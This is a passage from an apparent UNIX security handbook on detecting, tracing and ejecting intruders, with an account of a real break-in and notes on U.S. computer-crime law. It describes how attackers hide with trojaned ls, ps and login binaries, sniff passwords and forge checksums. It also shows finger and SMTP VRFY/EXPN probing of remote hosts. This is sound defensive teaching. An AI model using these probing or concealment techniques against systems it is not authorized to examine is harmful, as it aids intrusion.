You should be careful with the tools that you install on your system, as these tools can be used against you, to monitor your monitoring. Also, consider using tools such as snoop on another machine (not the one that has been compromised). Doing so lessens the chance of being discovered by the intruder.

24.2.4 Tracing a Connection

The ps, w, and who commands all report the terminals to which each user (or each process) is attached. Terminal names like /dev/tty01 may be abbreviated to tty01 or even to 01. Generally, names like tty01, ttya, or tty4a represent physical serial lines, while names that contain the letters p, q, or r (such as ttyp1) refer to network connections (virtual ttys, also called pseudo-terminals or ptys).

If the intruder has called your computer by telephone, you may be out of luck. In general, telephone calls can be traced only by prior arrangement with the telephone company. However, many telephone companies offer special features such as CALL*TRACE and CALLER*ID (CNID), which can be used with modem calls as easily as with voice calls. If you have already set up the service and installed the appropriate hardware, all you need to do is activate it. Then you can read the results.

If the intruder is logged in over the network, you can use the who command to determine quickly the name of the computer that the person may have used to originate the connection. Simply type who:

% who
orpheus  console  Jul 16 16:01
root     tty01    Jul 15 20:32
jason    ttyp1    Jul 16 18:43   (robot.ocp.com)
devon    ttyp2    Jul 16 04:33   (next.cambridge.m)
%

In this example, the user orpheus is logged in at the console, user root is logged on at tty01 (a terminal connected by a serial line), and jason and devon are both logged in over the network: jason from robot.ocp.com, and devon from next.cambridge.ma.us.

Some versions of the who command display only the first 16 letters of the hostname of the computer that originated the connection. (The machine name is stored in a 16-byte field in /etc/utmp; some versions of UNIX store more letters.) To see the complete hostname, you may need to use the netstat command (described in Chapter 16, TCP/IP Networks). You will also have to use netstat if the intruder has deleted or modified the /etc/utmp file to hide his presence. Unfortunately, netstat does not reveal which network connection is associated with which user. (Of course, if you have the first 16 characters of the hostname, you should be able to figure out which is which, even if /etc/utmp has been deleted. You can still use netstat and look for connections from unfamiliar machines.) Luckily, most modern versions of UNIX, including SVR4, report the entire machine name.
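
For instance (a sketch only; the hostname comes from the example above, and the exact output format of netstat varies between systems), you can look for the suspect machine directly:

% netstat -a | grep robot    # list all connections and filter for the suspicious host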

Let's say that in this example we suspect Jason is an intruder, because we know that the real Jason is at a yoga retreat in Tibet (with no terminals around). Using who and netstat, we determine that the intruder who has appropriated Jason's account is logged in remotely from the computer robot.ocp.com. We can now use the finger command to see which users are logged onto that remote computer:

% finger @robot.ocp.com
[robot.ocp.com]
Login    Name               TTY  Idle  When
olivia   Dr. Olivia Layson  co   12d   Sun 11:59
wonder   Wonder Hacker      p1         Sun 14:33
%

Of course, this method doesn't pin the attacker down, because the intruder may be using the remote machine only as a relay point. Indeed, in the above example, Wonder Hacker is logged into ttyp1, which is another virtual terminal. He's probably coming from another machine, and simply using robot.ocp.com as a relay point. You would probably not see a username like Wonder Hacker. More likely, you would only see an assorted list of apparently legitimate users and have to guess who the attacker is. Even if you did see a listing such as that, you can't assume anything about who is involved. For instance, Dr. Layson could be conducting industrial espionage on your system, using a virtual terminal (e.g., xterm) that is not listed as a logged-in session!

If you have an account on the remote computer, log into it and find out who is running the rlogin or telnet command that is coming into your computer. In any event, consider contacting the system administrator of that remote computer and alerting him or her to the problem.

24.2.4.1 Other tip-offs

There are many other tip-offs that an intruder might be logged onto your system. For example, you may discover that shells are running on terminals that no one seems to be logged into at the moment. You may discover open network connections to machines you do not recognize. Running processes may be reported by some programs but not others.

Be suspicious and nosy.

24.2.4.2 How to contact the system administrator of a computer you don't know

Often, you can't figure out the name and telephone number of the system administrator of a remote machine, because UNIX provides no formal mechanism for identifying such people.

One good way is to contact the appropriate incident response team and ask for the designated security person at the organization. Another way to find out the telephone number and email address of the remote administrator is to use the whois command to search the Network Information Center (NIC) registration database. If your system does not have a whois command, you can simply telnet to the NIC site. Below is an example of how to find the name and phone number of a particular site administrator.

The NIC maintains a database of the names, addresses, and phone numbers of significant network users, as well as the contact people for various hosts and domains. If you can connect to the host whois.internic.net via telnet, you may be able to get the information you need. Try the following:

1. Connect to the host whois.internic.net via telnet.
2. At the > prompt, type whois.
3. Try typing host robot.ocp.com (using the name of the appropriate machine, of course). The server may return a record indicating the administrative contact for that machine.
4. Try typing domain ocp.com (using the appropriate domain). The server may return a record indicating the administrative contact for that domain.
5. When done, type quit to disconnect.

Here is an example, showing how to get information about the domain whitehouse.gov:

% telnet whois.internic.net
Trying 198.41.0.6 ...
Connected to rs.internic.net.
Escape character is `^]'.
SunOS UNIX 4.1 (rs1) (ttyp1)
***********************************************************************
* -- InterNIC Registration Services Center --
*
* For wais, type:                  WAIS
* For the *original* whois type:   WHOIS [search string]
* For referral whois type:         RWHOIS [search string]
*
* For user assistance call (703) 742-4777
# Questions/Updates on the whois database to HOSTMASTER@internic.net
* Please report system problems to ACTION@internic.net
***********************************************************************
Please be advised that use constitutes consent to monitoring
(Elec Comm Priv Act, 18 USC 2701-2711)
Cmdinter Ver 1.3 Tue Oct 17 21:51:53 1995 EST
[xterm] InterNIC > whois
Connecting to the rs Database . . . . . .
Connected to the rs Database
Whois: whitehouse.gov
Executive Office of the President USA (WHITEHOUSE-HST)   WHITEHOUSE.GOV
   198.137.240.100
Whitehouse Public Access (WHITEHOUSE-DOM)                 WHITEHOUSE.GOV
Whois: whitehouse-dom
Whitehouse Public Access (WHITEHOUSE-DOM)
   Executive Office of the President USA
   Office of Administration
   Room NEOB 4208
   725 17th Street NW
   Washington, D.C. 20503
   Domain Name: WHITEHOUSE.GOV
   Administrative Contact:
      Fox, Jack S. (JSF)  fox_j@EOP.GOV
      (202) 395-7323
   Technical Contact, Zone Contact:
      Ranum, Marcus J. (MJR)  mjr@BSDI.COM
      (410) 889-6449
   Record last updated on 17-Oct-94.
   Record created on 17-Oct-94.
   Domain servers in listed order:
   GATEKEEPER.EOP.GOV   198.137.241.3
   ICM1.ICP.NET         192.94.207.66
Whois: quit
[xterm] InterNIC > quit
Tue Oct 17 21:55:30 1995 EST
Connection closed by foreign host.
%

In addition to looking for information about the host, you can look for information about the network domain. You may find that technical contacts are more helpful than administrative contacts. If that approach fails, you can attempt to discover the site's network service provider (by sending packets to the site using traceroute) and call them to see if they have contact information. Even if the site's network service provider will tell you nothing, he or she will often forward messages to the relevant people. In an emergency, you can call the organization's main number and ask the security guard to contact the computer center's support staff.

If you are attempting to find out information about a U.S. military site (the hostname ends in .mil), you need to try the whois command at nic.ddn.mil instead of the one at the InterNIC.

Another thing to try is to finger the root account of the remote machine. Occasionally this will produce the desired result:

% finger root@robot.ocp.com
[robot.ocp.com]
Login name: root          in real life: Joel Wentworth
Directory: /              Shell: /bin/csh
Last login Sat April 14, 1990 on /dev/tty
Plan:
For information regarding this computer, please contact
Joel Wentworth at 301-555-1212

More often, unfortunately, you'll be given useless information about the root account:

% finger root@robot.ocp.com
[robot.ocp.com]
Login name: root          in real life: Operator
Directory: /              Shell: /bin/csh
Last login Mon Dec. 3, 1990 on /dev/console
No plan

In these cases, you can try to figure out who the computer's system administrator is by connecting to the computer's sendmail daemon and identifying who gets mail for the root or postmaster mailboxes:

% telnet robot.ocp.com smtp
Trying...
Connected to robot.ocp.com
Escape character is "^]".
220 robot.ocp.com Sendmail NeXT-1.0 (From Sendmail 5.52)/NeXT-1.0 ready at Sun, 2 Dec 90 14:34:08 EST
helo mymachine.my.domain.com
250 robot.ocp.com Hello mymachine.my.domain.com, pleased to meet you
vrfy postmaster
250 Joel Wentworth
expn root
250 Joel Wentworth
quit
221 robot.ocp.com closing connection
Connection closed by foreign host.

You can then use the finger command to learn this person's telephone number.

Unfortunately, many system administrators have disabled their finger command, and the sendmail daemon may not honor your requests to verify or expand the alias. However, you may still be able to identify the contact person.

If all else fails, you can send mail to the "postmaster" of the indicated machine and hope it gets read soon. Do not mention a break-in in the message - mail is sometimes monitored by intruders. Instead, give your name and phone number, indicate that the matter is important, and ask the postmaster to call you. (Offering to accept collect calls is a nice gesture and may improve the response rate.) Of course, after you're phoned, find out the phone number of the organization you're dealing with and try phoning back - just to be sure that it's the administrator who phoned (and not the intruder who read your email and deleted it before it got to the administrator). You can also contact the folks at one of the FIRST teams, such as the CERT-CC. They have some additional resources, and they may be able to provide you with contact information.

24.2.5 Getting Rid of the Intruder

Killing your computer's power - turning it off - is the quickest way to get an intruder off your computer and prevent him from doing anything else, including possibly further damage. Unfortunately, this is a drastic action. Not only does it stop the intruder, but it also interrupts the work of all of your legitimate users. It may also delete evidence you might need in court some day, delete necessary evidence of the break-in, such as running processes (e.g., mailrace), and cause the system to be damaged when you reboot because of Trojaned startup scripts. In addition, the UNIX filesystem does not deal with sudden power loss very gracefully: pulling the plug might do significantly more damage than the intruder might ever do.

In some cases, you can get rid of an intruder by politely asking him or her to leave. Inform the person that breaking into your computer is both antisocial and illegal. Some computer trespassers have the motivation of a child sneaking across private property; they often do not stop to think about the full impact of their actions. However, don't bet on your intruder being so simplistic, even if he acts that way. (And keep in mind our warning earlier in this chapter.)

If the person refuses to leave, you can forcibly kill his or her processes with the kill command. Use the ps command to get a list of all of the user's process numbers, change the password of the penetrated account, and finally kill all of the attacker's processes with a single kill command. For example:

# ps -aux
USER    PID %CPU %MEM VSIZE RSIZE TT STAT TIME COMMAND
root   1434 20.1  1.4  968K  224K 01 R    0:00 ps aux
nasty   147  1.1  1.9 1.02M  304K p3 S    0:07 - (csh)
nasty   321 10.0  8.7  104K  104K p3 S    0:09 cat /etc/passwd
nasty   339  8.0  3.7 2.05M  456K p3 S    0:09 rogue
...
# passwd nasty
Changing password for nasty.
New password: rogue32
Retype new password: rogue32
# kill -9 147 321 339

You are well-advised to change the password on the account before you kill the processes - especially if the intruder is logged in as root. If the intruder is a faster typist than you are, you might find yourself forced off before you know it! Also bear in mind that most intruders will install a back door into the system. Thus, even if you change the password, that may not be sufficient to keep them off: you may need to take the system to single-user mode and check it out first.
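
On most UNIX systems you can drop to single-user mode for this kind of inspection with the shutdown command (a sketch only; option syntax and grace periods vary considerably between UNIX versions):

# shutdown +5 "Going down for emergency maintenance"   # warn logged-in users, then drop to single-user mode in five minutes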

As a last resort, you can physically break the connection. If the intruder has dialed in over a telephone line, you can turn off the modem - or unplug it from the back of the computer. If the intruder is connected through the network, you can unplug the network connector - although this will also interrupt service for all legitimate users. Once the intruder is off your machine, try to determine the extent of the damage done (if any), and seal the holes that let the intruder get in. You also should check for any new holes that the intruder may have created. This is an important reason for creating and maintaining the checklists described in Chapter 9, Integrity Management.

24.2.6 Anatomy of a Break-in

The following story is true. The names and a few details have been changed to protect people's jobs.

Late one night in November 1995, a part-time computer consultant at a Seattle-based firm logged into one of the computers that he occasionally used. The system seemed sluggish, so he ran the top command to get an idea of what was slowing down the system. The consultant noticed that a program called vs was consuming a large amount of system resources. The program was running as superuser.

Something didn't look right. To get more information, the programmer ran the ps command. That's when things got stranger still - the mysterious program didn't appear when ps was run. So the occasional system manager used the top command again, and, sure enough, the vs program was still running.

The programmer suspected a break-in. He started looking around the filesystem using the Emacs dired command and found the vs program in a directory called /var/.e. That certainly didn't look right. So the programmer went to his shell window, did a chdir() to the /var directory, and then did an ls -a. But the ls program didn't show the directory /var/.e. Nevertheless, the program was definitely there: it was still visible from the Emacs dired command.

The programmer was now pretty sure that somebody had broken into the computer. And the attack seemed sophisticated, because system commands appeared to have been altered to hide evidence of the break-in. Not wanting to let the break-in proceed further, the operator wanted to shut down the computer. But he was afraid that the attacker might have booby-trapped the /etc/halt command to destroy traces of the break-in. So before the programmer shut down the system, he used the tar command to make a copy of the directory /var/.e, as well as the directories /bin and /etc. As soon as the tar file was made, he copied it to another computer and halted the system.
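
In rough terms, that snapshot step looks like this (a sketch only; the archive name, the trusted host, and the destination path are hypothetical, and the directories are the ones from the story):

# tar cf /tmp/evidence.tar /var/.e /bin /etc               # preserve the suspicious directory and key system programs
# rcp /tmp/evidence.tar trusted-host:/safe/evidence.tar    # copy the archive to a machine the intruder cannot reach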

The following morning, the programmer made the following observations from the tar file:

● Somebody had broken into the system.
● The program /bin/login had been modified so that anybody on the Internet could log into the root account by trying a special password.
● The /var/.e/vs program that had been left running was a password sniffing program. It listened on the company's local area network for users typing their passwords; these passwords were then sent to another computer elsewhere on the Internet.
● The programs /bin/ls and /bin/ps had been modified so that they would not display the directory /var/.e.
● The inode creation dates and the modification times on the files /bin/ls, /bin/ps, and /bin/login had been reset to their original dates before the modifications took place. The checksums for the modified commands (as computed with the sum command) matched those of the original, unmodified versions. But a comparison of the programs with a backup made the previous month revealed that the programs had been changed (as illustrated below).
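
This is precisely the weakness that cryptographic checksums are meant to close: the simple CRC computed by sum can be made to match even after a file has been altered, while a message digest cannot practically be forged. A quick comparison against a known-good copy might look like this (a sketch only; the path of the saved copy is hypothetical, and the md5 command may be called md5sum or may not exist on some systems):

# sum /bin/login /backup/bin/login    # the 16-bit checksums of the two copies may match even though the files differ
# md5 /bin/login /backup/bin/login    # the MD5 digests of a modified binary will not match the original
# cmp /bin/login /backup/bin/login    # a byte-by-byte comparison settles the question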

It was 10:00 p.m. when the break-in was discovered. Nevertheless, the consultant telephoned the system manager at home. When he did, he discovered something else:

● The computer's system manager had known about the break-in for three days, but had not done anything about it. The reason: she feared that the intruder had created numerous holes in their system's security, and was afraid that if she angered the intruder, that person might take revenge by deleting important files or shutting down the system.

In retrospect, this was rather stupid behavior. Allowing the intruder to stay on the system let him collect more passwords from users of the system. The delay also allowed for plenty of time to make yet further modifications to the system. If it was compromised before, it was certainly compromised now!

Leaving the intruder alone also left the company in a precarious legal position. If the intruder used the system to break in anywhere else, the company might be held partially liable in a lawsuit because they left the intruder with free run of the compromised system.

So, what should the system manager have done when she first discovered the break-in? Basically, the same thing as what the outside consultant did: take a snapshot of the system to tape or another disk, isolate the system, and then investigate. If the staff was worried about some significant files being damaged, they should have done a complete backup right away to preserve whatever they could. If the system had been booby-trapped and a power failure occurred, they would have lost everything as surely as if they had shut down the system themselves.

The case above is typical of many break-ins that have occurred in 1994 and 1995. The attackers have access to one of many "toolkits" used to break into systems, install password sniffers, and alter system programs to hide their presence. Many of the users of these toolkits are quite ignorant of how they work. Some are even unfamiliar with UNIX: we have heard many stories of monitored systems compromised with these sophisticated toolkits, only to result in the intruders attempting to use DOS commands to look at files!

Chapter 26
Computer Security and U.S. Law

26.2 Criminal Prosecution

You are free to contact law-enforcement personnel any time you believe that someone has broken a criminal statute. You start the process by making a formal complaint to a law-enforcement agency. A prosecutor will then decide whether the allegations should be investigated and what (if any) charges should be filed.

In some cases (perhaps a majority of them), criminal investigation will not help your situation. If the perpetrators have left little trace of their activity and the activity is not likely to recur, or if the perpetrators are entering your system through a computer in a foreign country, you are not likely to trace or arrest the individuals involved. Many experienced computer intruders will leave little traceable evidence behind.[2]

[2] Although few computer intruders are as clever as they believe themselves to be.

There is no guarantee that a criminal investigation will ever result from a complaint that you file. The prosecutor involved (Federal, state, or local) will need to decide which, if any, laws have been broken, the seriousness of the crime, the availability of trained investigators, and the probability of a conviction. Remember that the criminal justice system is very overloaded; new investigations are started only for very severe violations of the law or for cases that warrant special treatment. A case in which $200,000 worth of data is destroyed is more likely to be investigated than is a case in which someone is repeatedly trying to break the password of your home computer.

Investigations can also place you in an uncomfortable and possibly dangerous position. If unknown parties are continuing to break into your system by remote means, law-enforcement authorities may ask you to leave your system open, thus allowing the investigators to trace the connection and gather evidence for an arrest. Unfortunately, if you leave your system open after discovering that it is being misused, and the perpetrator uses your system to break into or damage another system elsewhere, you may be the target of a third-party lawsuit. Cooperating with law-enforcement agents is not a sufficient shield from such liability. Before putting yourself at risk in this way, you should discuss alternatives with your lawyer.

26.2.1 The Local Option

One of the first things you must decide is to whom you should report the crime. Usually, you should deal with local or state authorities, if at all possible. Every state currently has laws against some sort of computer crime. If your local law-enforcement personnel believe that the crime is more appropriately investigated by the Federal government, they will suggest that you contact Federal authorities.

You cannot be sure whether your problem will receive more attention from local authorities or from Federal authorities. Local authorities may be more responsive because you are not as likely to be competing with a large number of other cases (as frequently occurs at the Federal level). Local authorities may also be more likely to be interested in your problems, no matter how small the problems may be. At the same time, local authorities may be reluctant to take on high-tech investigations where they have little expertise.[3] Many Federal agencies have expertise that can be brought in quickly to help deal with a problem. One key difference is that investigation and prosecution of juveniles is more likely to be done by state authorities than by Federal authorities.

[3] Although in some venues there are very experienced local law-enforcement officers, and they may be more experienced than a typical Federal officer.

Some local law-enforcement agencies may be reluctant to seek outside help or to bring in Federal agents. This may keep your particular case from being investigated properly.

In many areas, because the local authorities do not have the expertise or background necessary to investigate and prosecute computer-related crimes, you may find that they must depend on you for your expertise. In many cases, you will be involved with the investigation on an ongoing basis - possibly to a great extent. You may or may not consider this a productive use of your time.

Our best advice is to contact local law enforcement before any problem occurs, and get some idea of their expertise and willingness to help you in the event of a problem. The time you invest up front could pay big dividends later on if you need to decide who to call at 2 a.m. on a holiday because you have found evidence that someone is making unauthorized use of your system.

26.2.2 Federal Jurisdiction

Although you might often prefer to deal with local authorities, you should contact Federal authorities if you:

● Are working with classified or military information
● Have involvement with nuclear materials or information
● Work for a Federal agency and its equipment is involved
● Work for a bank or handle regulated financial information
● Are involved with interstate telecommunications
● Believe that people from out of the state or out of the country are involved with the crime

Offenses related to national security, fraud, or telecommunications are usually handled by the FBI. Cases involving financial institutions, stolen access codes, or passwords are generally handled by the U.S. Secret Service. However, other Federal agents may also have jurisdiction in some cases; for example, the Customs Department, the U.S. Postal Service, and the Air Force Office of Investigations have all been involved in computer-related criminal investigations.

Luckily, you don't need to determine jurisdiction on your own. If you believe that a Federal law has been violated in your incident, call the nearest U.S. Attorney's office and ask them who you should contact. Often, that office will have the name and contact information for a specific agent or office whose personnel have special training in investigating computer-related crimes.

26.2.3 Federal Computer Crime Laws

There are many Federal laws that can be used to prosecute computer-related crimes. Usually, the choice of law pertains to the type of crime, rather than whether the crime was committed with a computer, a phone, or pieces of paper. Depending on the circumstances, laws relating to wire fraud, espionage, or criminal copyright violation may come into play.

Some likely laws that might be used in prosecution include:

18 U.S.C. 646
     Embezzlement by a bank employee.
18 U.S.C. 793
     Gathering, transmitting, or losing defense information.
18 U.S.C. 912
     Impersonation of a government employee to obtain a thing of value.
18 U.S.C. 1005
     False entries in bank records.
18 U.S.C. 1006
     False entries in credit institution records.
18 U.S.C. 1014
     False statements in loan and credit applications.
18 U.S.C. 1029
     Credit Card Fraud Act of 1984.
18 U.S.C. 1030
     Computer Fraud and Abuse Act.
18 U.S.C. 1343
     Wire fraud (use of phone, wire, radio, or television transmissions to further a scheme to defraud).
18 U.S.C. 1361
     Malicious mischief to government property.
18 U.S.C. 2071
     Concealment, removal, or mutilation of public records.
18 U.S.C. 2314
     Interstate transportation of stolen property.
18 U.S.C. 2319
     Willful infringement of a copyright for profit.
18 U.S.C. 2701-2711
     Electronic Communications Privacy Act.

Privacy and the Electronic Communications Privacy Act

Passed in 1986, the Electronic Communications Privacy Act (ECPA) was intended to provide the same security for electronic mail as users of the U.S. Postal Service enjoy. In particular, the ECPA defines as a felony, under certain circumstances, reading other people's electronic mail. The ECPA also details the circumstances under which information may be turned over to Federal agents.

To date, there has not been enough prosecution under the ECPA to determine whether this law has met its goal. The law appears to provide some protection for systems carrying mail and for mail files, but the law does not clearly provide protection to every system. If your system uses or supports electronic mail, consult with your attorney to determine how the law might affect you and your staff.

In the coming years, we fully expect new laws to be passed governing crime on networks and malicious mischief on computers. We also expect some existing laws to be modified to extend coverage to certain forms of data used on computers. Luckily, you don't need to carefully track each and every piece of legislation in force (unless you really want to): the decision about which laws to use, if any, will be up to the U.S. Attorney for your district.

26.2.4 Hazards of Criminal Prosecution

There are many potential problems in dealing with law-enforcement agencies, not the least of which is their lack of experience with computer-related criminal investigations. Sadly, there are still many Federal agents who are not well versed in computers and computer crime. In most local jurisdictions, there may be even less expertise. Your case will probably be investigated by an agent who has little or no training in computing.

Computer-illiterate agents will sometimes seek your assistance and try to understand the subtleties of the case. Other times, they will ignore helpful advice - perhaps to hide their own ignorance - often to the detriment of the case and to the reputation of the law-enforcement community.

If you or your personnel are asked to assist in the execution of a search warrant, to help identify material to be searched, be sure that the court order directs such "expert" involvement. Otherwise, you may find yourself complicating the case by appearing as an overzealous victim. You will usually benefit by recommending an impartial third party to assist the law-enforcement agents.

The attitude and behavior of the law-enforcement officers can cause you major problems. Your equipment might be seized as evidence, or held for an unreasonable length of time for examination. If you are the victim and are reporting the case, the authorities will usually make every attempt to coordinate their examinations with you, to cause you the least amount of inconvenience. However, if the perpetrators are your employees, or if regulated information is involved (bank, military, etc.), you might have no control over the manner or duration of the examination of your systems and media. This problem becomes more severe if you are dealing with agents who need to seek expertise outside their local offices to examine the material. Be sure to keep track of downtime during an investigation, as it may be included as part of the damage during prosecution and any subsequent civil suit.

An investigation is another situation in which backups can be extremely valuable. You might even make use of your disaster-recovery plan, and use a standby or spare site while your regular system is being examined.

Heavy-handed or inept investigative efforts may also place you in an uncomfortable position with respect to the computer community. Attitudes directed toward law-enforcement officers can easily be redirected toward you. Such attitudes can place you in a worse light than you deserve, and may hinder not only cooperation with the current investigation, but also with other professional activities. Furthermore, they may make you a target for electronic attack or other forms of abuse after the investigation concludes. These attitudes are unfortunate, because there are some very good investigators, and careful investigation and prosecution may be needed to stop malicious or persistent intruders.

For these reasons, we encourage you to carefully consider the decision to involve law-enforcement agencies with any security problem pertaining to your system. In most cases, we suggest that you may not want to involve the criminal justice system at all unless a real loss has occurred, or unless you are unable to control the situation on your own. In some instances, the publicity involved in a case may be more harmful than the loss you have sustained. However, be aware that the problem you spot may be part of a much larger problem that is ongoing or beginning to develop. You may be risking further damage and delay if you decide to ignore the situation.

We wish to stress the positive. Law-enforcement agencies are aware of the need to improve how they<br />

investigate computer crime cases, and they are working to develop in-service training, forensic analysis<br />

facilities, and other tools to help them conduct effective investigations. In many jurisdictions (especially<br />

in high-tech areas of the country), investigators and prosecutors have gained considerable experience and<br />

have worked to convey that information to their peers. The result is a significant improvement in law<br />

enforcement effectiveness over the last few years, with a number of successful investigations and<br />

prosecutions. You should very definitely think about the positive aspects of reporting a computer crime -<br />

not only for yourself, but for the community as a whole. Successful prosecutions may help dissuade<br />

further misuse of your system and of others' systems.<br />

26.2.5 If You or One of Your Employees Is a Target of an Investigation...

If law-enforcement officials believe that your computer system has been used by an employee to break<br />

into other computer systems, to transmit or store controlled information (trade secrets, child<br />

pornography, etc.), or to otherwise participate in some computer crime, you may find your computers<br />

impounded by a search warrant (criminal cases) or writ of seizure (civil cases). If you can document that<br />

your employee has had limited access to your systems, and if you present that information during the<br />

search, it may help limit the scope of the confiscation. However, you may still be in a position in which<br />

some of your equipment is confiscated as part of a legal search.<br />

Local police or Federal authorities can present a judge with a petition to grant a search warrant if they<br />


believe there is evidence to be found concerning a violation of a law. If the warrant is in order, the judge<br />

will almost always grant the search warrant. Currently, a few Federal investigators and law-enforcement<br />

personnel in some states have a poor reputation for heavy-handed and excessively broad searches. The<br />

scope of the search is usually detailed in the warrant by the agent in charge and approved by the judge;<br />

most warrants are derived from "boiler plate" examples that are themselves too broad. These problems<br />

have resulted in considerable ill will, and in the future might result in evidence not being admissible on<br />

Constitutional grounds because a search was too wide-ranging. How to define the proper scope of a<br />

search is still a matter of some evolution in the courts.<br />

Usually, the police seek to confiscate anything connected with the computer that may have evidence<br />

(e.g., files with stolen source code or telephone access codes). This confiscation might result in seizure of<br />

the computer, all magnetic media that could be used with the computer, anything that could be used as an<br />

external storage peripheral (e.g., videotape machines and tapes), auto-dialers that could contain phone<br />

numbers for target systems in their battery-backed memory, printers and other peripherals necessary to<br />

examine your system (in case it is nonstandard in setup), and all documentation and printouts. In past<br />

investigations, even laser printers, answering machines, and televisions have been seized by Federal<br />

agents.<br />

Officers are required to give a receipt for what they take. However, you may wait a very long time before<br />

you get your equipment back, especially if there is a lot of storage media involved, or if the officers are<br />

not sure what they are looking for. Your equipment may not even be returned in working condition -<br />

batteries discharge, media degrades, and dust works its way into moving parts.<br />

You should discuss the return of your equipment during the execution of the warrant, or thereafter with<br />

the prosecutors. You should indicate priorities (and reasons) for the items to be returned. In most cases,<br />

you can request copies of critical data and programs. As the owner of the equipment, you can also file<br />

suit[4] to have it returned, but such suits may drag on and may not be productive. Suits to recover<br />

damages may not be allowed against law-enforcement agencies that are pursuing a legitimate<br />

investigation.<br />

[4] If it is a Federal warrant, your lawyer may file a "Motion for Return of Property" under<br />

Rule 41(e) of the Federal Rules of Criminal Procedure.<br />

You can also challenge the reasons used to file the warrant and seek to have it declared invalid, forcing<br />

the return of your equipment. However, in some cases, warrants have been sealed to protect ongoing<br />

investigations and informants, so this option can be made much more difficult to execute. Equipment and<br />

media seized during a search may be held until a trial if they contain material to be used as prosecution<br />

evidence. Some state laws require forfeiture of the equipment on conviction.<br />

At present, a search is not likely to involve confiscation of a mainframe or even a minicomputer.<br />

However, confiscation of tapes, disks, and printed material could disable your business even if the<br />

computer itself is not taken. Having full backups offsite may not be sufficient protection, because tapes<br />

might also be taken by a search warrant. If you think that a search might curtail your legitimate business,<br />

be sure that the agents conducting the search have detailed information regarding which records are vital<br />

to your ongoing operation and request copies from them.<br />

Until the law is better defined in this area, you are well advised to consult with your attorney if you are at<br />

all worried that a confiscation might occur. Furthermore, if you have homeowners' or business insurance,<br />


you might check with your agent to see if it covers damages resulting from law-enforcement agents<br />

during an investigation. Business interruption insurance provisions should also be checked if your<br />

business depends on your computer.<br />

26.2.6 Other Tips<br />

Here is a summary of additional observations about the application of criminal law to deter possible<br />

abuse of your computer. Note that most of these are simply good policy whether or not you anticipate<br />

break-ins.<br />

● Replace any welcome message from your login program and /etc/motd file with warnings to unauthorized users stating that they are not welcome. We know of no legal precedent where a welcome message has been used as a successful defense for a break-in; however, some legal authorities have counselled against anything that might suggest a welcome for unwanted visitors. (A sample banner appears after this list.)

● Put copyright and/or proprietary ownership notices in your source code and data files. Do so at the top of each and every file. If you express a copyright, consider filing for the registered copyright - this version can enhance your chances of prosecution and recovery of damages.

● Be certain that your users are notified about what they can and cannot do.

● If it is consistent with your policy, put all users of your system on notice about what you may monitor. This includes email, keystrokes, and files. Without such notice, monitoring an intruder or a user overstepping bounds could itself be a violation of wiretap or privacy laws!

● Keep good backups in a safe location. If comparisons against backups are necessary as evidence, you need to be able to testify as to who had access to the media involved. Having tapes in a public area probably will prevent them from being used as evidence.

● If something happens that you view as suspicious or that may lead to involvement of law-enforcement personnel, start a diary. Note your observations and actions, and note the times. Run paper copies of log files or traces and include those in your diary. A written record of events such as these may prove valuable during the investigation and prosecution. Note the time and context of each and every contact with law-enforcement agents, too.

● Try to define, in writing, the authorization of each employee and user of your system. Include in the description the items to which each person has legitimate access (and the items that each person cannot access). Have a mechanism in place so that each person is apprised of this description and can understand their limits.

● Tell your employees explicitly that they must return all materials, including manuals and source code, when requested or when their employment terminates.

● If something has happened that you believe requires law-enforcement investigation, do not allow your personnel to conduct their own investigation. Doing too much on your own may prevent some evidence from being used, or may otherwise cloud the investigation. You may also aggravate law-enforcement personnel with what they might perceive to be outside interference in their investigation.

● Make your employees sign an employment agreement that delineates their responsibilities with respect to sensitive information, machine usage, electronic mail use, and any other aspects of computer operation that might later arise. Make sure the policy is explicit and fair, and that all employees are aware of it and have signed the agreement. State clearly that all access and privileges terminate when employment does, and that subsequent access without permission will be prosecuted.

● Make contingency plans with your lawyer and insurance company for actions to be taken in the event of a break-in or other crime, related investigation, and subsequent events.

● Identify, ahead of time, law-enforcement personnel who are qualified to investigate problems that you may have. Introduce yourself and your concerns to them in advance of a problem. Having at least a nodding acquaintance will help if you later encounter a problem that requires you to call upon law enforcement for help.

● Consider joining societies or organizations that stress ongoing security awareness and training. Work to enhance your expertise in these areas.
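
As a minimal sketch of the first tip in the list above, a warning banner might be installed along the following lines. The wording here is only an example - have your own legal counsel review the text you actually use.

# Replace the message of the day with an unwelcoming banner (run as root).
# Many systems let you put similar text in the pre-login message as well.
cat > /etc/motd << 'EOF'
This system is for authorized users only. Unauthorized access or use is
prohibited, may be monitored and recorded, and may be reported to
law-enforcement authorities.
EOF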

26.2.7 A Final Note on Criminal Actions<br />

Finally, keep in mind that criminal investigation and prosecution can only occur if you report the crime.<br />

If you fail to report the crime, there is no chance of apprehension. Not only does that not help your<br />

situation, it leaves the perpetrators free to harm someone else.<br />

A more subtle problem results from a failure to report serious computer crimes: such failure leads others<br />

to believe that there are few such crimes being committed. As a result, little emphasis is placed on<br />

budgets or training for new law-enforcement agents in this area, little effort is made to enhance the<br />

existing laws, and little public attention is focused on the problem. The consequence is that the<br />

computing milieu becomes incrementally more dangerous for all of us.<br />



Chapter 24
Discovering a Break-in

24.5 An Example

Suppose you're a system administrator and John Q. Random is there with you in your office. Suddenly,<br />

an alert window pops up on your display, triggered by a Swatch rule monitoring the syslog output. The<br />

syslog message has indicated that John Q. Random has logged in and has used the su command to<br />

become root.<br />
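
The Swatch configuration itself is not shown here; as a rough stand-in only, a small shell script such as the following could raise the same sort of alert. The log file name and the exact wording of the su message are assumptions and vary from system to system.

#!/bin/sh
# Watch the syslog output for su-to-root messages and alert the administrator.
tail -f /var/log/messages | while read line
do
    case "$line" in
    *"su: "*root*)
        echo "ALERT: possible su to root: $line" | mail -s "su alert" root
        ;;
    esac
done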

The user must be an intruder - an intruder who has become root!<br />

Fortunately, in one of the windows on your terminal you have a superuser shell. You decide that the best<br />

course of action is to bring your system to an immediate halt. To do so, you execute the commands:<br />

# sync<br />

# /etc/init 0<br />

Alternatively, you can send a TERM signal to the init process:<br />

# sync<br />

# kill -TERM 1<br />

This method is not the recommended procedure on System V systems, but is required on BSD systems.<br />

Your decision to halt the system was based on the fact that you had no idea who this intruder was or what<br />

he was doing, and the fact that the intruder had become the superuser. After the intruder is the superuser,<br />

you don't know what parts of the operating system he is modifying, if any.<br />

For example, the intruder may be replacing system programs and destroying log files. You decide that<br />

the best thing you can do is to shut the system down and go to a protected terminal where you know that<br />

no other intruder is going to be interfering with the system while you figure out what's going on.<br />

The next step is to get a printed copy of all of the necessary logs that you may have available (e.g.,<br />

